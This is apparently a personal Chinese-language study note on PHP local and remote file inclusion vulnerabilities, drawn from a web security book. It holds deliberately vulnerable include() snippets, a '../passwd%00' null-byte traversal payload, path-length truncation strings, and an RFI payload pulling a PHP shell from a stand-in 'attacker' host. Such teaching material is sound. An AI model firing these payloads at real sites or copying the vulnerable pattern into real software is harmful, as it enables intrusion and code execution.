0x00 前言
看《白帽子讲web安全》的笔记,自己实际操作一下再记录一下感觉印象比较深刻
0x01 文件包含漏洞
PHP的文件包含漏洞是最常见的,在PHP中文件包含主要由4个函数完成:
include()
require()
include_once() //只包含一次,如果该文件包含过了,就不能再包含了
require_once()
当使用这4个函数包含一个新的文件时,该文件将作为PHP代码执行,PHP内核并不会在意该被包含的文件是什么类型,所以如果被包含的是txt、图片、远程URL也将作为PHP代码执行
<?php
include($_GET[test]);
?>
但是当fortest.txt中加入可执行的php代码时:
要想成功利用文件包含漏洞,需要满足下面两个条件:
- include()等函数通过动态变量的方式引入需要包含的文件;
- 用户能够控制该动态变量
0x02 本地文件包含
能够打开并包含本地文件的漏洞,被称为本地文件包含漏洞(Local File Inclusion,简称LFI漏洞)
$file=$_GET['file'];
if(file_exists('/home/test/'.$file.'.php')){
include '/home/test/'.$file.'.php';
}
?>
当我们将$file的值赋值为../passwd时,其实被包含的文件是/home/passwd.php,但是并没有passwd.php文件(存在passwd文件),所以需要利用C语言(PHP内核是由C语言完成的)中的一些字符串的处理方法——在链接字符串时,0字节(\x00)将作为字符串结束符。所以,只要在最后加入一个0字节,就能截断file变量之后的字符串
../passwd%00 //web输入时,将\0进行URL编码
如果'\0'被替换掉了,也可以利用操作系统对目录的最大长度的限制,达到截断的目标
例如:
././././././././././././././././abc
//////////////////////////abc
0x03 远程文件包含
如果php的配置选项allow_url_include为on的话,则include/require函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞(Remote File Include,简称RFI)
<?php
if($route=="share"){
require_once $basePath.'/action/m_share.php';
}elseif($route=="sharelink"){
require_once $basePath.'/action/m_sharelink.php';
}
?>
因为在$basePath前面没有任何障碍,所以构造
/?param=hettp://attacker/phpshell.txt?
最终加载的代码实际上执行了:
require_once 'hettp://attacker/phpshell.txt?/action/m_share.php'
?后面的代码被截断了,也可以用%00来截断